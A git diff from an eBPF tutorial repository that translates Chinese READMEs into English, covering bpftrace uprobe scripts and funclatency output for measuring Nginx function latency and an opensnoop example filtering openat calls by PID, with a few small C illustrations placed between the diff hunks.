Below is a script that traces the execution time of several critical Nginx functions: ```bt #!/usr/sbin/bpftrace -// 监控 HTTP 请求处理的开始 +// Monitor the start of HTTP request processing uprobe:/usr/sbin/nginx:ngx_http_process_request { - printf("HTTP 请求处理开始 (tid: %d)\n", tid); + printf("HTTP request processing started (tid: %d)\n", tid); @start[tid] = nsecs; } -// 监控 HTTP 请求的完成 +// Monitor when an HTTP request is finalized uretprobe:/usr/sbin/nginx:ngx_http_finalize_request /@start[tid]/ { $elapsed = nsecs - @start[tid]; - printf("HTTP 请求处理时间: %d ns (tid: %d)\n", $elapsed, tid); + printf("HTTP request processed in %d ns (tid: %d)\n", $elapsed, tid); delete(@start[tid]); } -// 监控向上游服务器发送请求的开始 +// Monitor the start of sending a request to an upstream server uprobe:/usr/sbin/nginx:ngx_http_upstream_send_request { - printf("开始向上游服务器发送请求 (tid: %d)\n", tid); + printf("Upstream request sending started (tid: %d)\n", tid); @upstream_start[tid] = nsecs; } -// 监控上游请求发送完成 +// Monitor when the upstream request is sent uretprobe:/usr/sbin/nginx:ngx_http_upstream_send_request /@upstream_start[tid]/ { $elapsed = nsecs - @upstream_start[tid]; - printf("上游请求发送完成时间: %d ns (tid: %d)\n", $elapsed, tid); + printf("Upstream request sent in %d ns (tid: %d)\n", $elapsed, tid); delete(@upstream_start[tid]); } -// 监控事件处理的开始 +// Monitor the start of event processing uprobe:/usr/sbin/nginx:ngx_event_process_posted { - printf("事件处理开始 (tid: %d)\n", tid); + printf("Event processing started (tid: %d)\n", tid); @event_start[tid] = nsecs; } -// 监控事件处理的完成 +// Monitor when event processing is completed uretprobe:/usr/sbin/nginx:ngx_event_process_posted /@event_start[tid]/ { $elapsed = nsecs - @event_start[tid]; - printf("事件处理时间: %d ns (tid: %d)\n", $elapsed, tid); + printf("Event processed in %d ns (tid: %d)\n", $elapsed, tid); delete(@event_start[tid]); } ``` -### 运行脚本 +### Running the Program -要运行上述脚本,先启动 Nginx,然后使用 `curl` 等工具生成 HTTP 请求: +To run the above script, start Nginx and use a tool like `curl` to generate HTTP requests: ```bt # bpftrace /home/yunwei37/bpf-developer-tutorial/src/39-nginx/trace.bt Attaching 4 probes... -事件处理开始 (tid: 1071) -事件处理时间: 166396 ns (tid: 1071) -事件处理开始 (tid: 1071) -事件处理时间: 87998 ns (tid: 1071) -HTTP 请求处理开始 (tid: 1071) -HTTP 请求处理时间: 1083969 ns (tid: 1071) -事件处理开始 (tid: 1071) -事件处理时间: 92597 ns (tid: 1071) +Event processing started (tid: 1071) +Event processed in 166396 ns (tid: 1071) +Event processing started (tid: 1071) +Event processed in 87998 ns (tid: 1071) +HTTP request processing started (tid: 1071) +HTTP request processed in 1083969 ns (tid: 1071) +Event processing started (tid: 1071) +Event processed in 92597 ns (tid: 1071) ``` -该脚本监控了几个 Nginx 函数的开始和结束时间,并打印了每个函数的执行时间。这些数据可以用来分析和优化 Nginx 服务器的性能。 +The script monitors the start and end times of various Nginx functions and prints the elapsed time for each. This data can be used to analyze and optimize the performance of your Nginx server. -## 测试 Nginx 的函数延迟 +## Testing Function Latency in Nginx -为了更详细地分析函数延迟,您可以使用 `funclatency` 工具,该工具可以测量 Nginx 函数的延迟分布。以下是如何测试 `ngx_http_process_request` 函数的延迟: +For a more detailed analysis of function latency, you can use the `funclatency` tool, which measures the latency distribution of Nginx functions. Here’s how to test the latency of the `ngx_http_process_request` function: ```console # sudo ./funclatency /usr/sbin/nginx:ngx_http_process_request @@ -128,22 +126,20 @@ Tracing /usr/sbin/nginx:ngx_http_process_request. 
Hit Ctrl-C to exit Exiting trace of /usr/sbin/nginx:ngx_http_process_request ``` -### 结果总结 +### Summary of Results -上述结果显示了 `ngx_http_process_request` 函数的延迟分布。大多数请求在 524,288 至 1,048,575 纳秒内处理完成,少部分请求处理时间更长。这些信息对于识别性能瓶颈和优化 Nginx 请求处理至关重要。 +The results above show the distribution of latency for the `ngx_http_process_request` function. The majority of requests were processed within 524,288 to 1,048,575 nanoseconds, with a smaller percentage taking longer. This information can be crucial in identifying performance bottlenecks and optimizing request handling in Nginx. -通过使用 `funclatency`,您可以: +By using `funclatency`, you can: -- **识别性能瓶颈**:了解哪些函数执行时间最长,并将优化工作重点放在这些函数上。 -- **监控系统性能**:定期监控函数延迟,确保在高负载下 Nginx 服务器的最佳性能。 -- **优化 Nginx 配置**:利用延迟测量得出的洞察调整 Nginx 设置或修改应用程序,以提高整体性能。 +- **Identify Performance Bottlenecks**: Understand which functions are taking the most time to execute and focus your optimization efforts there. +- **Monitor System Performance**: Regularly monitor function latency to ensure your Nginx server is performing optimally, especially under heavy load. +- **Optimize Nginx Configuration**: Use the insights gained from latency measurements to tweak Nginx settings or modify your application to improve overall performance. -您可以在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency) 中找到 `funclatency` 工具。 +You can find the `funclatency` tool in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency). -## 结论 +## Conclusion -通过 eBPF 跟踪 Nginx 请求可以为您的 Web 服务器提供宝贵的性能洞察,使您能够监控、分析和优化其操作。使用 `bpftrace` 和 `funclatency` +Tracing Nginx requests with eBPF provides valuable insights into the performance of your web server, allowing you to monitor, analyze, and optimize its operation. By using tools like `bpftrace` and `funclatency`, you can measure function execution times, identify bottlenecks, and make data-driven decisions to improve your Nginx deployment. - 等工具,您可以测量函数执行时间、识别瓶颈,并根据数据做出决策来改进 Nginx 部署。 - -如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或查看我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 +For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or check out our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). 
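As a practical aside for the testing steps above: if you need steady traffic while the bpftrace script or `funclatency` is attached, a small load generator is enough. A minimal C sketch (it assumes nginx is serving plain HTTP on 127.0.0.1:80; adjust the address and request as needed):

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    const char req[] = "GET / HTTP/1.0\r\nHost: localhost\r\n\r\n";
    char buf[4096];
    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(80) };
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);

    for (int i = 0; i < 100; i++) {
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        if (fd < 0 || connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
            perror("connect");
            return 1;
        }
        write(fd, req, strlen(req));
        while (read(fd, buf, sizeof(buf)) > 0)
            ; /* drain the response */
        close(fd);
    }
    return 0;
}
```

Each iteration exercises the full request path, so every probe in the script above fires at least once per loop.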
diff --git a/src/39-nginx/README.zh.md b/src/39-nginx/README.zh.md
new file mode 100644
index 0000000..1fa4cf2
--- /dev/null
+++ b/src/39-nginx/README.zh.md
@@ -0,0 +1,149 @@
+# Using eBPF to Trace Nginx Requests
+
+## Introduction
+
+Nginx is one of the most popular web servers and reverse proxies in the world, known for its high performance, stability, and low resource consumption. It is widely used for serving static content, load balancing, and acting as a reverse proxy for dynamic applications. To maintain its performance edge, it is especially important to monitor and optimize Nginx's operation, particularly when handling a large number of requests. With eBPF (Extended Berkeley Packet Filter), you can gain deep insight into Nginx's performance and identify and fix bottlenecks, all without modifying the source code or restarting the service.
+
+eBPF is a revolutionary technology that allows developers to run custom programs in the Linux kernel. Originally designed for network packet filtering, eBPF has evolved into a versatile tool widely used for tracing, monitoring, and analyzing system behavior. By leveraging eBPF, you can trace Nginx's critical functions, measure latency, identify bottlenecks, and then optimize system performance.
+
+## Background: Nginx and eBPF
+
+### Nginx
+
+Nginx operates on an event-driven architecture, which lets it handle thousands of concurrent connections efficiently with minimal resource usage. This efficiency relies on a number of performance-critical functions for request processing, response generation, and event handling. Understanding how these functions behave under different loads is key to optimizing your use of Nginx.
+
+### eBPF
+
+eBPF programs run in a secure, sandboxed environment within the Linux kernel. These programs can attach to various hooks, such as system calls, tracepoints, and even user-space functions via uprobes (user-level probes). This makes eBPF a powerful tool for system observability, collecting detailed performance data and enforcing policies in real time.
+
+One common use case of eBPF is tracing function execution time to measure latency. This is particularly useful for understanding how long specific Nginx functions take to execute, helping to diagnose performance issues, optimize resource usage, and improve the overall efficiency of your Nginx deployment.
+
+### Uprobes
+
+Uprobes are probes for tracing functions of user-space applications. They attach to the entry and exit points of specific user-space functions, capturing precise timing information. Note, however, that using uprobes with the kernel-mode eBPF runtime can introduce some performance overhead. To mitigate this, you can consider [bpftime](https://github.com/eunomia-bpf/bpftime), a user-mode eBPF runtime based on LLVM JIT/AOT. It runs eBPF programs in user space, is compatible with kernel-mode eBPF, and can potentially reduce the overhead.
+
+## Performance-Critical Functions in Nginx
+
+Here are some performance-critical Nginx functions that can be monitored with eBPF:
+
+- **ngx_http_process_request**: Processes incoming HTTP requests. Monitoring this function helps track the start of request handling.
+- **ngx_http_upstream_send_request**: Sends requests to upstream servers when Nginx acts as a reverse proxy.
+- **ngx_http_finalize_request**: Finalizes HTTP request processing, including sending the response. Tracing it measures total request handling time.
+- **ngx_event_process_posted**: Processes queued events in the event loop.
+- **ngx_handle_read_event**: Handles read events from sockets, crucial for monitoring network I/O performance.
+- **ngx_writev_chain**: Sends responses back to the client, typically used together with the write event loop.
+
+## Using bpftrace to Trace Nginx Functions
+
+To monitor these functions, we can use `bpftrace`, a high-level tracing language for eBPF. Below is a script that traces the execution time of several critical Nginx functions:
+
+```bt
+#!/usr/sbin/bpftrace
+
+// Monitor the start of HTTP request processing
+uprobe:/usr/sbin/nginx:ngx_http_process_request
+{
+    printf("HTTP request processing started (tid: %d)\n", tid);
+    @start[tid] = nsecs;
+}
+
+// Monitor when an HTTP request is finalized
+uretprobe:/usr/sbin/nginx:ngx_http_finalize_request
+/@start[tid]/
+{
+    $elapsed = nsecs - @start[tid];
+    printf("HTTP request processed in %d ns (tid: %d)\n", $elapsed, tid);
+    delete(@start[tid]);
+}
+
+// Monitor the start of sending a request to an upstream server
+uprobe:/usr/sbin/nginx:ngx_http_upstream_send_request
+{
+    printf("Upstream request sending started (tid: %d)\n", tid);
+    @upstream_start[tid] = nsecs;
+}
+
+// Monitor when the upstream request is sent
+uretprobe:/usr/sbin/nginx:ngx_http_upstream_send_request
+/@upstream_start[tid]/
+{
+    $elapsed = nsecs - @upstream_start[tid];
+    printf("Upstream request sent in %d ns (tid: %d)\n", $elapsed, tid);
+    delete(@upstream_start[tid]);
+}
+
+// Monitor the start of event processing
+uprobe:/usr/sbin/nginx:ngx_event_process_posted
+{
+    printf("Event processing started (tid: %d)\n", tid);
+    @event_start[tid] = nsecs;
+}
+
+// Monitor when event processing is completed
+uretprobe:/usr/sbin/nginx:ngx_event_process_posted
+/@event_start[tid]/
+{
+    $elapsed = nsecs - @event_start[tid];
+    printf("Event processed in %d ns (tid: %d)\n", $elapsed, tid);
+    delete(@event_start[tid]);
+}
+```
+
+### Running the Script
+
+To run the above script, start Nginx first, then generate HTTP requests with a tool like `curl`:
+
+```bt
+# bpftrace /home/yunwei37/bpf-developer-tutorial/src/39-nginx/trace.bt
+Attaching 4 probes...
+Event processing started (tid: 1071)
+Event processed in 166396 ns (tid: 1071)
+Event processing started (tid: 1071)
+Event processed in 87998 ns (tid: 1071)
+HTTP request processing started (tid: 1071)
+HTTP request processed in 1083969 ns (tid: 1071)
+Event processing started (tid: 1071)
+Event processed in 92597 ns (tid: 1071)
+```
+
+The script monitors the start and end times of several Nginx functions and prints the elapsed time for each. This data can be used to analyze and optimize the performance of your Nginx server.
+
+## Testing Function Latency in Nginx
+
+For a more detailed analysis of function latency, you can use the `funclatency` tool, which measures the latency distribution of Nginx functions. Here is how to test the latency of the `ngx_http_process_request` function:
+
+```console
+# sudo ./funclatency /usr/sbin/nginx:ngx_http_process_request
+tracing /usr/sbin/nginx:ngx_http_process_request...
+tracing func ngx_http_process_request in /usr/sbin/nginx...
+Tracing /usr/sbin/nginx:ngx_http_process_request.  Hit Ctrl-C to exit
+^C
+     nsec                : count    distribution
+         0 -> 1          : 0        |                                        |
+    524288 -> 1048575    : 16546    |****************************************|
+   1048576 -> 2097151    : 2296     |*****                                   |
+   2097152 -> 4194303    : 1264     |***                                     |
+   4194304 -> 8388607    : 293      |                                        |
+   8388608 -> 16777215   : 37       |                                        |
+Exiting trace of /usr/sbin/nginx:ngx_http_process_request
+```
+
+### Summary of Results
+
+The results above show the latency distribution of the `ngx_http_process_request` function. The majority of requests were processed within 524,288 to 1,048,575 nanoseconds, with a small share taking longer. This information is crucial for identifying performance bottlenecks and optimizing request handling in Nginx.
+
+By using `funclatency`, you can:
+
+- **Identify Performance Bottlenecks**: Understand which functions take the longest to execute and focus your optimization efforts there.
+- **Monitor System Performance**: Regularly monitor function latency to ensure optimal performance of your Nginx server under heavy load.
+- **Optimize Nginx Configuration**: Use the insights from latency measurements to tweak Nginx settings or modify your application to improve overall performance.
+
+You can find the `funclatency` tool in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency).
+
+## Conclusion
+
+Tracing Nginx requests with eBPF provides valuable performance insights into your web server, allowing you to monitor, analyze, and optimize its operation. Using tools like `bpftrace` and `funclatency`, you can measure function execution times, identify bottlenecks, and make data-driven decisions to improve your Nginx deployment.
+
+If you are interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or check out our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/).
diff --git a/src/39-nginx/README_en.md b/src/39-nginx/README_en.md
deleted file mode 100644
index 44ff33f..0000000
--- a/src/39-nginx/README_en.md
+++ /dev/null
@@ -1,145 +0,0 @@
-# Using eBPF to Trace Nginx Requests
-
-Nginx is one of the most popular web servers and reverse proxies in the world, known for its high performance, stability, and low resource consumption. It is widely used for serving static content, load balancing, and acting as a reverse proxy for dynamic applications. To maintain its performance edge, it's crucial to monitor and optimize Nginx's operations, especially when handling a large number of requests. One powerful way to gain insights into Nginx's performance is by using eBPF (Extended Berkeley Packet Filter).
-
-eBPF is a revolutionary technology that allows developers to run custom programs in the Linux kernel. Originally designed for network packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior in both kernel and user space. By leveraging eBPF, you can trace Nginx's critical functions, measure latency, and identify bottlenecks without modifying the source code or restarting the service.
-
-## Background: Nginx and eBPF
-
-### Nginx
-
-Nginx operates on an event-driven architecture, making it highly efficient and capable of handling thousands of simultaneous connections with minimal resources. This efficiency is achieved through various performance-critical functions involved in request processing, response generation, and event handling. Understanding how these functions behave under different loads is key to optimizing Nginx for your specific use case.
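To make the "event-driven" part of that description concrete, the pattern boils down to a single `epoll` instance multiplexing many sockets. A stripped-down C sketch of the pattern (a toy echo server on port 8080, purely illustrative and not nginx's actual code):

```c
#include <netinet/in.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void) {
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in a = { .sin_family = AF_INET, .sin_port = htons(8080),
                             .sin_addr.s_addr = htonl(INADDR_ANY) };
    int one = 1;
    setsockopt(lfd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    bind(lfd, (struct sockaddr *)&a, sizeof(a));
    listen(lfd, 128);

    int ep = epoll_create1(0);
    struct epoll_event ev = { .events = EPOLLIN, .data.fd = lfd };
    epoll_ctl(ep, EPOLL_CTL_ADD, lfd, &ev);

    for (;;) {
        struct epoll_event events[64];
        int n = epoll_wait(ep, events, 64, -1);   /* block until sockets are ready */
        for (int i = 0; i < n; i++) {
            if (events[i].data.fd == lfd) {       /* new connection: register it */
                int c = accept(lfd, NULL, NULL);
                struct epoll_event cev = { .events = EPOLLIN, .data.fd = c };
                epoll_ctl(ep, EPOLL_CTL_ADD, c, &cev);
            } else {                              /* readable client: echo and close */
                char buf[512];
                ssize_t r = read(events[i].data.fd, buf, sizeof(buf));
                if (r > 0)
                    write(events[i].data.fd, buf, r);
                close(events[i].data.fd);
            }
        }
    }
}
```

Functions like `ngx_event_process_posted`, traced later in this article, run inside exactly this kind of loop, which is why their latency is a good proxy for event-loop health.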
- -### eBPF - -eBPF programs run in a secure, sandboxed environment within the Linux kernel. These programs can attach to various hooks, such as system calls, tracepoints, and even user-space functions via uprobes (user-level probes). This capability allows you to collect detailed performance data and enforce policies in real time, making eBPF an invaluable tool for system observability. - -One common use case of eBPF is tracing function execution to measure latency, which is particularly useful for understanding how long specific Nginx functions take to execute. This information can help in diagnosing performance issues, optimizing resource usage, and improving the overall efficiency of your Nginx deployment. - -### Uprobes - -Uprobes are a type of probe that can be used to trace functions in user-space applications, such as Nginx. They work by attaching to specific user-space function entry and exit points, allowing you to capture precise timing information. However, it’s important to note that using uprobes in the kernel mode eBPF runtime may cause some performance overhead. To mitigate this, you can consider using a user-mode eBPF runtime like [bpftime](https://github.com/eunomia-bpf/bpftime), which is based on LLVM JIT/AOT. This runtime can run eBPF programs in user space, offering compatibility with kernel mode eBPF while potentially reducing overhead. - -## Performance-Critical Functions in Nginx - -Here are some key Nginx functions that are performance-critical and can be monitored using eBPF: - -- **ngx_http_process_request**: Processes incoming HTTP requests. Monitoring this function helps track the start of request handling. -- **ngx_http_upstream_send_request**: Handles sending requests to upstream servers when Nginx is acting as a reverse proxy. -- **ngx_http_finalize_request**: Finalizes HTTP request processing, including sending the response. Tracing this can measure total request handling time. -- **ngx_event_process_posted**: Processes queued events as part of the Nginx event loop. -- **ngx_handle_read_event**: Handles read events from sockets, crucial for monitoring network I/O performance. -- **ngx_writev_chain**: Sends responses back to the client, typically used in conjunction with the write event loop. - -## Using bpftrace to Trace Nginx Functions - -To monitor these functions, we can use `bpftrace`, a high-level tracing language for eBPF. 
Below is a script that traces the execution time of several critical Nginx functions: - -```bt -#!/usr/sbin/bpftrace - -// Monitor the start of HTTP request processing -uprobe:/usr/sbin/nginx:ngx_http_process_request -{ - printf("HTTP request processing started (tid: %d)\n", tid); - @start[tid] = nsecs; -} - -// Monitor when an HTTP request is finalized -uretprobe:/usr/sbin/nginx:ngx_http_finalize_request -/@start[tid]/ -{ - $elapsed = nsecs - @start[tid]; - printf("HTTP request processed in %d ns (tid: %d)\n", $elapsed, tid); - delete(@start[tid]); -} - -// Monitor the start of sending a request to an upstream server -uprobe:/usr/sbin/nginx:ngx_http_upstream_send_request -{ - printf("Upstream request sending started (tid: %d)\n", tid); - @upstream_start[tid] = nsecs; -} - -// Monitor when the upstream request is sent -uretprobe:/usr/sbin/nginx:ngx_http_upstream_send_request -/@upstream_start[tid]/ -{ - $elapsed = nsecs - @upstream_start[tid]; - printf("Upstream request sent in %d ns (tid: %d)\n", $elapsed, tid); - delete(@upstream_start[tid]); -} - -// Monitor the start of event processing -uprobe:/usr/sbin/nginx:ngx_event_process_posted -{ - printf("Event processing started (tid: %d)\n", tid); - @event_start[tid] = nsecs; -} - -// Monitor when event processing is completed -uretprobe:/usr/sbin/nginx:ngx_event_process_posted -/@event_start[tid]/ -{ - $elapsed = nsecs - @event_start[tid]; - printf("Event processed in %d ns (tid: %d)\n", $elapsed, tid); - delete(@event_start[tid]); -} -``` - -### Running the Program - -To run the above script, start Nginx and use a tool like `curl` to generate HTTP requests: - -```bt -# bpftrace /home/yunwei37/bpf-developer-tutorial/src/39-nginx/trace.bt -Attaching 4 probes... -Event processing started (tid: 1071) -Event processed in 166396 ns (tid: 1071) -Event processing started (tid: 1071) -Event processed in 87998 ns (tid: 1071) -HTTP request processing started (tid: 1071) -HTTP request processed in 1083969 ns (tid: 1071) -Event processing started (tid: 1071) -Event processed in 92597 ns (tid: 1071) -``` - -The script monitors the start and end times of various Nginx functions and prints the elapsed time for each. This data can be used to analyze and optimize the performance of your Nginx server. - -## Testing Function Latency in Nginx - -For a more detailed analysis of function latency, you can use the `funclatency` tool, which measures the latency distribution of Nginx functions. Here’s how to test the latency of the `ngx_http_process_request` function: - -```console -# sudo ./funclatency /usr/sbin/nginx:ngx_http_process_request -tracing /usr/sbin/nginx:ngx_http_process_request... -tracing func ngx_http_process_request in /usr/sbin/nginx... -Tracing /usr/sbin/nginx:ngx_http_process_request. Hit Ctrl-C to exit -^C - nsec : count distribution - 0 -> 1 : 0 | | - 524288 -> 1048575 : 16546 |****************************************| - 1048576 -> 2097151 : 2296 |***** | - 2097152 -> 4194303 : 1264 |*** | - 4194304 -> 8388607 : 293 | | - 8388608 -> 16777215 : 37 | | -Exiting trace of /usr/sbin/nginx:ngx_http_process_request -``` - -### Summary of Results - -The results above show the distribution of latency for the `ngx_http_process_request` function. The majority of requests were processed within 524,288 to 1,048,575 nanoseconds, with a smaller percentage taking longer. This information can be crucial in identifying performance bottlenecks and optimizing request handling in Nginx. 
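The `distribution` column that funclatency prints comes from power-of-two bucketing: each sample lands in the slot floor(log2(latency)), so the "524288 -> 1048575" row is slot 19. A small standalone C sketch of that bucketing (the slot arithmetic is the standard approach, not funclatency's actual source):

```c
#include <stdio.h>

/* slot = floor(log2(v)): position of the highest set bit */
static unsigned log2_slot(unsigned long long v) {
    unsigned slot = 0;
    while (v >>= 1)
        slot++;
    return slot;
}

int main(void) {
    unsigned long long latencies_ns[] = { 700000, 900000, 1500000, 3000000 };
    unsigned hist[64] = { 0 };
    for (int i = 0; i < 4; i++)
        hist[log2_slot(latencies_ns[i])]++;
    for (unsigned s = 19; s <= 21; s++)          /* print the buckets we filled */
        printf("%llu -> %llu : %u\n",
               1ULL << s, (1ULL << (s + 1)) - 1, hist[s]);
    return 0;
}
```

Doing the bucketing in the eBPF program keeps the per-event cost to a few instructions and one map update, which is why log2 histograms are the usual choice for in-kernel latency aggregation.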
- -By using `funclatency`, you can: - -- **Identify Performance Bottlenecks**: Understand which functions are taking the most time to execute and focus your optimization efforts there. -- **Monitor System Performance**: Regularly monitor function latency to ensure your Nginx server is performing optimally, especially under heavy load. -- **Optimize Nginx Configuration**: Use the insights gained from latency measurements to tweak Nginx settings or modify your application to improve overall performance. - -You can find the `funclatency` tool in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency). - -## Conclusion - -Tracing Nginx requests with eBPF provides valuable insights into the performance of your web server, allowing you to monitor, analyze, and optimize its operation. By using tools like `bpftrace` and `funclatency`, you can measure function execution times, identify bottlenecks, and make data-driven decisions to improve your Nginx deployment. - -For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or check out our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). diff --git a/src/4-opensnoop/README.md b/src/4-opensnoop/README.md index 616488e..c2648cf 100644 --- a/src/4-opensnoop/README.md +++ b/src/4-opensnoop/README.md @@ -1,16 +1,16 @@ -# eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid +# eBPF Tutorial by Example 4: Capturing Opening Files and Filter with Global Variables -eBPF(Extended Berkeley Packet Filter)是一种内核执行环境,它可以让用户在内核中运行一些安全的、高效的程序。它通常用于网络过滤、性能分析、安全监控等场景。eBPF 之所以强大,是因为它能够在内核运行时捕获和修改数据包或者系统调用,从而实现对操作系统行为的监控和调整。 +eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior. -本文是 eBPF 入门开发实践教程的第四篇,主要介绍如何捕获进程打开文件的系统调用集合,并使用全局变量在 eBPF 中过滤进程 pid。 +This article is the fourth part of the eBPF Tutorial by Example, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF. -在 Linux 系统中,进程与文件之间的交互是通过系统调用来实现的。系统调用是用户态程序与内核态程序之间的接口,它们允许用户态程序请求内核执行特定操作。在本教程中,我们关注的是 sys_openat 系统调用,它用于打开文件。 +In Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user space programs and kernel space programs, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files. -当进程打开一个文件时,它会向内核发出 sys_openat 系统调用,并传递相关参数(例如文件路径、打开模式等)。内核会处理这个请求,并返回一个文件描述符(file descriptor),这个描述符将在后续的文件操作中用作引用。通过捕获 sys_openat 系统调用,我们可以了解进程在什么时候以及如何打开文件。 +When a process opens a file, it issues a sys_openat system call to the kernel and passes relevant parameters (such as file path, open mode, etc.). The kernel handles this request and returns a file descriptor, which serves as a reference for subsequent file operations. By capturing the sys_openat system call, we can understand when and how a process opens a file. 
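For reference, the call being traced looks like this from the application's side; a minimal C sketch using `openat(2)`:

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    /* AT_FDCWD means "resolve the path relative to the current directory";
     * the tracepoint below fires on entry to exactly this system call. */
    int fd = openat(AT_FDCWD, "/etc/hostname", O_RDONLY);
    if (fd < 0) {
        perror("openat");
        return 1;
    }
    printf("got file descriptor %d\n", fd);
    close(fd);
    return 0;
}
```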
-## 在 eBPF 中捕获进程打开文件的系统调用集合
+## Capturing the System Call Collection of Process Opening Files in eBPF
 
-首先,我们需要编写一段 eBPF 程序来捕获进程打开文件的系统调用,具体实现如下:
+First, we need to write an eBPF program to capture the system call of a process opening a file. The specific implementation is as follows:
 
 ```c
 #include <vmlinux.h>
@@ -27,6 +27,7 @@ int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx
 
     if (pid_target && pid_target != pid)
         return false;
+    // Use bpf_printk to print the process information
     bpf_printk("Process ID: %d enter sys openat\n", pid);
     return 0;
@@ -36,32 +37,33 @@ int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx
 
 char LICENSE[] SEC("license") = "GPL";
 ```
 
-这段 eBPF 程序实现了:
+This eBPF program implements the following:
 
-1. 引入头文件:`<vmlinux.h>` 包含了内核数据结构的定义,`<bpf/bpf_helpers.h>` 包含了 eBPF 程序所需的辅助函数。
-2. 定义全局变量 `pid_target`,用于过滤指定进程 ID。这里设为 0 表示捕获所有进程的 sys_openat 调用。
-3. 使用 `SEC` 宏定义一个 eBPF 程序,关联到 tracepoint "tracepoint/syscalls/sys_enter_openat"。这个 tracepoint 会在进程发起 `sys_openat` 系统调用时触发。
-4. 实现 eBPF 程序 `tracepoint__syscalls__sys_enter_openat`,它接收一个类型为 `struct trace_event_raw_sys_enter` 的参数 `ctx`。这个结构体包含了关于系统调用的信息。
-5. 使用 `bpf_get_current_pid_tgid()` 函数获取当前进程的 PID 和 TID(线程 ID)。由于我们只关心 PID,所以将其值右移 32 位赋值给 `u32` 类型的变量 `pid`。
-6. 检查 `pid_target` 变量是否与当前进程的 pid 相等。如果 `pid_target` 不为 0 且与当前进程的 pid 不相等,则返回 `false`,不对该进程的 `sys_openat` 调用进行捕获。
-7. 使用 `bpf_printk()` 函数打印捕获到的进程 ID 和 `sys_openat` 调用的相关信息。这些信息可以在用户空间通过 BPF 工具查看。
-8. 将程序许可证设置为 "GPL",这是运行 eBPF 程序的必要条件。
+1. Include header files: `<vmlinux.h>` contains the definitions of kernel data structures, and `<bpf/bpf_helpers.h>` contains the helper functions required by eBPF programs.
+2. Define the global variable `pid_target` for filtering a specified process ID. Setting it to 0 captures sys_openat calls from all processes.
+3. Use the `SEC` macro to define an eBPF program associated with the tracepoint "tracepoint/syscalls/sys_enter_openat". This tracepoint is triggered when a process initiates the `sys_openat` system call.
+4. Implement the eBPF program `tracepoint__syscalls__sys_enter_openat`, which takes a parameter `ctx` of type `struct trace_event_raw_sys_enter`. This structure contains information about the system call.
+5. Use the `bpf_get_current_pid_tgid()` function to retrieve the PID and TID (Thread ID) of the current process. Since we only care about the PID, we shift its value 32 bits to the right and assign it to the variable `pid` of type `u32`.
+6. Check if the `pid_target` variable is equal to the current process's PID. If `pid_target` is not 0 and is not equal to the current process's PID, return `false` to skip capturing the `sys_openat` call of that process.
+7. Use the `bpf_printk()` function to print the captured process ID and relevant information about the `sys_openat` call. This information can be viewed in user space using BPF tools.
+8. Set the program license to "GPL", which is a necessary condition for running eBPF programs.
+
+This eBPF program can be loaded into the kernel and executed using tools like libbpf or eunomia-bpf. It captures the sys_openat system call of the specified process (or all processes) and outputs relevant information in user space.
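Concretely, the id packing that step 5 describes looks like this; a tiny userspace C sketch of the same bit manipulation (the numbers are made up):

```c
#include <stdio.h>

typedef unsigned long long u64;
typedef unsigned int u32;

int main(void) {
    /* bpf_get_current_pid_tgid() packs two ids into one u64:
     * upper 32 bits = tgid (the "PID" that ps shows), lower 32 bits = tid. */
    u64 id = ((u64)1234 << 32) | 5678;  /* a made-up return value */
    u32 pid = id >> 32;                 /* 1234: what the filter compares */
    u32 tid = (u32)id;                  /* 5678: the thread id */
    printf("pid=%u tid=%u\n", pid, tid);
    return 0;
}
```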
-eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。完整代码请查看 。
